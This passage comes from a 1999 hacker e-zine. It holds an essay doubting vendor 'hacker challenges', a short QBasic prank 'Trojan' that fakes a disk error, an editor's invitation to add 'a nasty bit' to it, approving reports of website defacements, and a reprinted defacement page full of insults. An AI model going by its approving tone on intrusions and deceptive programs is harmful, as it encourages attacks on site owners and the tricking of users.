     that attempted to hack it at a recent hacker convention. Your
     amazed, surely their high price tag is nothing for complete
     security!? 

     Only what if it is all a clever ploy, haven't you got to ask yourself
     just how many people actually tried to hack into that particular
     piece of software? Haven't you got to look into the reputation of the
     manufacturer? Of course you do! To be sure, you've got to ask for
     the cold hard facts, not the marketing babble! 

     There are serious flaws in many hacker challenges, not the least
     being that most 'real' hackers only hear about them after they've
     finished. This makes you wonder just who took part, and how they
     found out about it. 

     It's not uncommon for hackers and security analysts to earn wages
     in excess of six figures, and to earn such wages, you've got to be
     either very lucky, or very busy. So what's your guarantee that a
     hacker who actually knows what he is doing, actually took the time
     out to earn a, comparatively, small ten thousand? You have no
     guarantee at all, why on earth should he or she bother? 

     Next ask yourself whether real hackers would want to find all those
     bugs in that new technological innovation. Surely their only going to
     end up making their job, of hacking, harder by pointing them out? 

     However, A low level source code analysis of a piece of software or
     a close look at hardware by reputable third party security analysis
     company will delay product ship times and cost a lot more than
     setting up a hacker challenge. Not to mention that it has nowhere
     near the same marketing punch. Display your product at an
     upcoming convention and let people bang on it for a weekend and
     then claim "Product X survives Hacker Challenge." Makes a great
     press release. 

     It all seems rather corrupt, with companies hiding the truth and
     rubbing their hands at the millions they make. A ten thousand dollar
     reward seems rather pathetic, when your earning ten times that
     kind of money. Surely these companies know this, are they in fact
     attempting to social engineer the hackers or maybe worse their
     customers? 

     But it's not all like that, there are plenty of genuine challenges out
     there. Some have been set up to test software and, now more and
     more, hardware, others testing entire networks. For example,
     recently the Quebec government is enlisting the aid of hackers to
     test its networks and to research new ways of protecting those
     networks. 

     So what can we say about hacker challenges? Do they really prove
     how secure a product is? I don't think so, the fact that most aren't
     officially announced to the hacker public and that they are often
     deliberately misinterpret, doesn't give a good impression. But then,
     who should a company go to? It's not the easiest of tasks in the
     world, to announce such a challenge. 

     Hack at your own discretion, don't be afraid to take part in a hacker
     challenge, but don't take the word of the manufacturer, when they
     say it's secure, just because a few passers by a convention typed a
     few keys on a keyboard. There will always be flaws in hardware and
     software, it's up to us to the true hacker to find and fix them,
     whether we do it for the companies maketing campaign, or for
     personal gratification. 



 13.0  #13 A BASIC Trojan, 
       ~~~~~~~~~~~~~~~~~~~  
 
       Type it in and run it .. in this form its benign but once compiled with a
       nasty bit (use your imagination) it can do anything u want it to... - Ed
       
      <SNIP>
      ' written in Qbasic 2.0
      ' public domain 1989 Cruciphux 
      ' warning bogus 'code' follows;       
      randomize timer
      
      print "C:\"
      print "Drive error, fat unreadable."
      input "press any key to restart.";a$
      shell "dir"
     
      1 a$=inkey$
        if a$="" goto 1
        i=150
      
      2 print "Volume in dri e C has no labe"
      print "Directory of C:\��؀sucker"
      for xx=1 to 500:next
      for t=1 to 20
      close 1:open "O",1,"xxxxxxxx.xxx"
      print #1,"x"
      
      b=int(24*rnd+1)
      for x = 1 to b
      a=int(i*rnd+1)
      if a<>12 then print chr$(a);
      next:next
      
      goto 1
      <SNIP>
      
      I know its lame but I know some of you will have fun with this ... ;-)
      
      @HWA     

 AD.S  ADVERTISING.           The HWA black market                    ADVERTISEMENTS.
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
            *** IT HAS BEEN FOUR YEARS! *** F R E E  M I T N I C K  **NOW!**
       
       www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
       n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
       m www.2600.com ########################################ww.2600.com www.freeke
       vin.com www.kev#  Support 2600.com and the Free Kevin #.com www.kevinmitnick.
       com www.2600.co#  defense fund site, visit it now! .  # www.2600.com www.free
       kevin.com www.k#           FREE KEVIN                 #in.com www.kevinmitnic
       k.com www.2600.########################################om www.2600.com www.fre
       ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
       k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
       
       
       To place an ad in this section simply type it up and email it to 
       hwa@press,usmc.net, put AD! in the subject header please. - Ed
       
          
  H.W  Hacked websites
       ~~~~~~~~~~~~~~~
       
       Note: The hacked site reports stay, especially with some cool hits by
       groups like H.A.R.P, go get em boyz racism is a mugs game! - Ed
     
       Feb 20th 1999
       When I visited www.hackernews.com today I was greeted with this:
       
       Index of /

       Name                      Last modified     Size  Description
       
       [DIR] Parent Directory       20-Feb-99 01:14  -
      
      Were they hacked? www.l0pht.com is not answering HTTP requests... more
      on this when we find out what went down. - Ed
      
       
      http://www.200cigarettes.com/
      Contributed by Spikeman  Feb 20th 1999-
        
      Crappy Movies - Frequently Asked Questions 
        
      
      
      Why does MTV suck? 
      MTV sucks because they play crappy videos and they have stupid television
      shows which are harder to watch than the insipid movies they endorse. The
      only programing station worse than MTV is WB. I often wonder what is
      harder to watch: MTV's The Real Worl d and its cast of cretins or Moesha.
      That's probably because I watch too much TV to begin with. But that's
      another issue all together. 
      
      
      You guys seem pretty knoweldgable about what sucks and what doesn't, where
      can I talk to you guys to find out more? 
      irc.psychic.com It's cool there. Uhm, yeah. 
      
      
      Why did you guys hack the 200 Cigarettes web site? The movie isn't even
      out yet. 
      Because we know it will suck. MTV endorses it, thusly, it sucks. Courtney
      Love is in it, thusly, it will suck. Robert Deniro is not in it, thusly,
      it will suck. It's another Gen-Xish type movie that I find very insulting.
      What ever happened to quality movies about serial killers and mobsters
      blowing each other up? I don't give a shit about some crappy bar scene in
      some far away, imaginary candyland that Paramount created to make them
      millions of dollars off rich, suburban white kids with too much ti me and
      apparently too much money on their hands. 
      
      
      Who is that guy on MTV's Road Rules that wears the r00t hat? 
      No clue. But whoever he is he's not a very snappy dresser and he seems to
      have a little trouble in social situations. He also seems to have
      difficulties communicating effectively with the sista among them. I like
      how MTV always sticks in their token black person, or token asian person,
      or token gay person, to fill the show out so it's a little more P.C.. It's
      pretty cool how there's always some white person that likes to fight with
      the token black person all the while MTV capitalizes off of it. And,
      honestly, would you wear that r00t hat in public? If the answer is yes,
      please stop reading this, get up, go outside and lie down in the street
      until a car runs you over and your brains squirt out all over the road
      causing many accidents and traffic delays. Because you are a dork. 
      
      
      Where should I go to meet you guys again? 
      irc.psychic.com 
      
      
      Aren't you guys going to speak spanish and talk about Venezuela or some
      other opressed South American country? 
      Yes. Arriba la raza. Yo quiero Taco Bell. And free Venezuela or something. 
      
      
      Who else should we free? 
      Kevin Mitnick, Mumia Abu-Jamal and Truman. Oh wait, Truman got out at the
      end. Okay, scratch the Truman thing. I wonder how much Jim Carrey got paid
      for that movie. I'm sure it's too much. 
      
      
      Courtney Love is looking kinda skanky, how do you guys feel about her
      doing movies? 
      The People vs. Larry Flynt was good, with no thanks from her, if ya ask
      me. Courtney Love is not only a crappy actress, but she's a crappy
      singer/guitarist and her band sucks too. Kurt Kaboom wasn't as great as
      everyone thinks as well. Neither was Tupac now that we're on the subject
      of celebrities who have died from gunshot wounds. Stupid celebrities. 
      
      
      What other celebrities died of gunshot wounds? 
      I don't know. I think that guy who played Hogan on Hogan's heroes did. JFK
      did. Abraham Lincoln, does he count? Robert Kennedy. Biggie Smalls. The
      old bass player from Metallica had a bus fall on his head. That's kinda
      cool. Does he count? 
      
      
      Where again? 
      irc.psychic.com 
      
      
      Will you guys keep on hacking movie sites to tell us they suck? 
      Most likely. 


      You guys rock, can I have your autographs. 
      No. 
  
  
      Please go to irc.psychic.com and tell us how lame we are and that we're
      not as badass as we think.


       Once again: 
        - this page hacked by MagicFX 
        - this page written by boomy 
  
  


       GREETS BY MAGICFX TO: 


       - The FBI (can I work for you guys?) 
       - The CIA (I guess I'm lucky you fellows don't care about movie hacks.) 
       - The NSA (Can I have one of your computers?  C'mon, you  got plenty!) 


        and:  All my friends :) 
  


       SHOUT OUTS BY BOOMY TO: 
  
       - VH1, for not putting out crappy movies like MTV. 
  
  
       EoA
              
       Feb 19th 1999
       contributed by lsd44 
       
       S C R E A M of H.A.R.P (Hackers Against Racist Parties) has
       cracked whitepower.com. This is the same person who cracked
       the Klu Klux Klan a few days ago. 

       Whitepride.com
       HNN Cracked Pages Archive 

       HNN recieved reports that the following sites had been cracked:
       http://www.andygrace.com
       http://www.netatnite.com
       http://home.serve.net
       
       Feb17th 1999
       Collected by sAs- Contributed by dunkelsite from HNN http://www.hackernews.com/
       
       Venezuela Cracked
       At dawn local time on February 16, 1999, www.cordiplan.gov.ve
       and www.ipasme.gov.ve where cracked by ^^DarDdEath^^ and
       Dunkelseite respectively. In both cases the home page was
       changed to protest against bad government, corruption and the
       suffering of 80% of the Venezuelans who live in critical poverty. 

       HNN Cracked Pages Archive (url:http://www.hackernews.com/archive/crackarch.html)
       Central Office of Coordination and Planning (url:http://www.cordiplan.gov.ve)
       
       Collected by sAs- Feb 15th  contributed by Anonymous from HNN 
       
       Cracked
       (From HNN http://www.hackernews.com/ rumours section)
       We have recieved reports that the following sites have been
       cracked by the following people. 

       hakb0y, opt1mus, RazaMExicana 
       http://harry.lbl.gov
       http://www.cbvm.net
       http://www.yauni.co.kr
       http://www.bcb.gov.bo
       http://work.go.kr
       
       @HWA
       
       _________________________________________________________________________
                 
  A.0                              APPENDICES
       _________________________________________________________________________
        
  
  
  A.1  PHACVW, sekurity, security, cyberwar links
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
       The links are no longer maintained in this file, there is now a 
      links section on the http://welcome.to/HWA.hax0r.news/ url so check
      there for current links etc.
    
      The hack FAQ (The #hack/alt.2600 faq)
      http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
    
      Hacker's Jargon File (The quote file)
      http://www.lysator.liu.se/hackdict/split2/main_index.html
    
   

      International links:(TBC)
      ~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Foreign correspondants and others please send in news site links that
      have security news from foreign countries for inclusion in this list
      thanks... - Ed
      
      Netherlands...: http://security.pine.nl/
      Russia........: http://www.tsu.ru/~eugene/
      Indonesia.....: http://www.k-elektronik.org/index2.html
                      http://members.xoom.com/neblonica/
      Brasil........: http://www.psynet.net/ka0z
                      http://www.elementais.cjb.net           

    Got a link for this section? email it to hwa@press.usmc.net and i'll 
    review it and post it here if it merits it. 
    
    

  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-  
    --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--       
       
    � 1998, 1999 (c) Cruciphux/HWA.hax0r.news
    (r) Cruciphux is a trade mark of Huge Whales of Armenia
    

  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  
     Hackerz Without Attitudez Information Warfare Alliance Website
     Opening soon:
                          www.hwa-iwa.org
                         
    
     --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
   [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
       [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]